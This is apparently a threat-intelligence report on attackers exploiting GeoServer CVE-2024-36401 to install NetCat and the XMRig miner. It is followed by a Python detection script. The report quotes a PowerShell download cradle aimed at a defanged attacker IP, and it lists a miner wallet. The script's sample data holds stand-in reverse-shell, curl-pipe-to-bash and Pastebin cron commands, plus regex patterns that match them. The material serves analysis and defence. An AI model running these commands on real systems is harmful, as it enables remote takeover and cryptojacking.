CoinMiner Attacks Exploiting GeoServer Vulnerability
AhnLab SEcurity intelligence Center (ASEC) has confirmed that unpatched GeoServer installations are still under continuous attack. Threat actors are scanning for vulnerable GeoServer instances and installing CoinMiner on them. ASEC has also identified infection cases in South Korea.
1. GeoServer Remote Code Execution Vulnerability (CVE-2024-36401)
GeoServer is an open-source Geographic Information System (GIS) server written in Java that provides a platform for processing spatial data. In 2024, a vulnerability (CVE-2024-36401) that allowed unauthorized users to execute code remotely was disclosed. Since then, various threat actors have exploited this vulnerability to install malware.
In September 2024, Fortinet disclosed attack cases in which CVE-2024-36401 was exploited to distribute malware such as GOREVERSE, SideWalk, Mirai, Condi, and CoinMiner. [1] Trend Micro also published a report on an attack campaign by the Earth Baxia threat actor, which exploited CVE-2024-36401 in spear-phishing attacks against a Taiwanese government agency. [2]
2. Attack Case in South Korea
In South Korea, Windows environments with GeoServer installed were targeted. Because the installed GeoServer was a version in which CVE-2024-36401 had not been patched, it is highly likely that the vulnerability was exploited to install the malware. The threat actor exploited the vulnerability to execute PowerShell commands and ultimately installed NetCat and the XMRig CoinMiner.

Figure 1. PowerShell process executed by vulnerability exploitation
2.1. NetCat
In the initial access phase, the threat actor executed a PowerShell command responsible for downloading a downloader. First, the threat actor downloaded the PowerShell script “adminc.ps1”, which installs NetCat. NetCat is a utility that transmits data to and from a specified target over TCP or UDP. However, it can also be abused as a remote shell, and threat actors often use it to control infected systems. When NetCat is executed with the “-e” argument, it connects to the C&C server and operates as a reverse shell, allowing the threat actor to control the infected system from the C&C server.

Figure 2. NetCat installation routine
2.2. XMRig
The distribution URL hosts both a PowerShell script and a Bash script that install XMRig. It is suspected that the threat actor used one script or the other depending on the operating system on which GeoServer is installed. In the Windows environment, the vulnerable GeoServer executed the following PowerShell command, and the downloaded PowerShell script installed XMRig.
> IEX(New-Object Net.WebClient).DownloadString('hxxp://182.218.82.[1]4/js/1/gw.txt')

Figure 3. PowerShell script to install XMRig
In attacks against Linux systems, the Bash script is likely used instead. These attacks are similar to those against Windows: the threat actor downloads XMRig and its configuration file. The Bash malware terminates processes suspected to be competing CoinMiner strains and executes “startup.sh” to run XMRig.

Figure 4. Bash script to install XMRig
The Bash script also registers a command as a cron job to maintain persistence. This command executes a script downloaded from Pastebin.

Figure 5. Cron job executing additional commands from Pastebin
The downloaded XMRig configuration specifies the following pool, wallet (user), and password values:
- url : pool.supportxmr.com:443
- user : 47DsNc5pK8rYBQF4ev3mNBct3tkkHuUmxeqCSSbX3YuBhXweSB9XeQbcPMqEBaSJy4bGrPxbdMJkphrVQ5AmastoEMpSjcU
- pass : x
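As an added example that is not part of the ASEC report, the following Python scans constructed process-creation events and crontab lines for the behaviours described in section 2: a JVM (GeoServer) spawning a shell, the PowerShell download cradle, NetCat launched with the “-e” argument, and a cron entry that fetches from Pastebin. All host names, image names, and sample lines are constructed placeholders.

```python
import re

# Constructed sample telemetry for this example (not taken from the report).
# Each process event is (parent image, child image, command line).
SAMPLE_PROCESS_EVENTS = [
    ("java.exe", "powershell.exe",
     "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient)"
     ".DownloadString('http://c2.example.invalid/js/1/gw.txt')\""),
    ("powershell.exe", "nc.exe", "nc.exe -e cmd.exe c2.example.invalid 4444"),
    ("java", "sh", "sh -c \"curl -fsSL http://c2.example.invalid/x.sh | bash\""),
    ("explorer.exe", "powershell.exe", "powershell -c Get-Service"),
]
# Constructed crontab lines; the first mimics the Pastebin persistence command.
SAMPLE_CRON_LINES = [
    "*/10 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLEID | sh",
    "0 2 * * * /usr/bin/apt-get update",
]

# GeoServer runs inside a JVM, so a shell spawned directly by java is the
# first observable trace of exploitation on the host.
JVM_IMAGES = {"java", "java.exe", "javaw.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "sh", "bash", "dash"}

# PowerShell download cradle seen in the Windows case (whitespace-tolerant).
DOWNLOAD_CRADLE = re.compile(
    r"IEX\s*\(\s*New-Object\s+(?:System\.)?Net\.WebClient\s*\)\s*\.DownloadString", re.I)
# NetCat started with -e, which hands a program (a shell here) to the remote peer.
NETCAT_EXEC = re.compile(r"(?:^|[\\/\s])(?:nc|ncat|netcat)(?:\.exe)?(?=\s).*\s-e\s+\S+", re.I)
# Cron command that pulls its payload from Pastebin.
PASTEBIN_CRON = re.compile(r"pastebin\.com", re.I)

def scan_process_events(events):
    """Return (rule, command line) pairs for events matching the campaign's behaviour."""
    findings = []
    for parent, child, cmdline in events:
        if parent.lower() in JVM_IMAGES and child.lower() in SHELL_IMAGES:
            findings.append(("jvm_spawned_shell", cmdline))
        if DOWNLOAD_CRADLE.search(cmdline):
            findings.append(("powershell_download_cradle", cmdline))
        if NETCAT_EXEC.search(cmdline):
            findings.append(("netcat_exec_reverse_shell", cmdline))
    return findings

def scan_cron_lines(lines):
    """Return non-comment crontab entries whose command fetches from Pastebin."""
    return [l for l in lines if not l.lstrip().startswith("#") and PASTEBIN_CRON.search(l)]

if __name__ == "__main__":
    for rule, cmd in scan_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"[{rule}] {cmd}")
    for line in scan_cron_lines(SAMPLE_CRON_LINES):
        print(f"[cron_pastebin_fetch] {line}")
```

The parent/child check is the most durable of the four rules, since the download URL and NetCat file name change between campaigns while GeoServer's JVM spawning a shell does not.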
3. Conclusion
Since the GeoServer remote code execution vulnerability (CVE-2024-36401) was disclosed, cases of threat actors exploiting it to install malware continue to be identified. Threat actors are targeting environments with vulnerable GeoServer installations on both Windows and Linux, and have installed NetCat and the XMRig CoinMiner. Once installed, the CoinMiner uses the system’s resources to mine Monero for the threat actor. The threat actor can then use the installed NetCat to perform various malicious actions, such as installing other malware or stealing information from the system.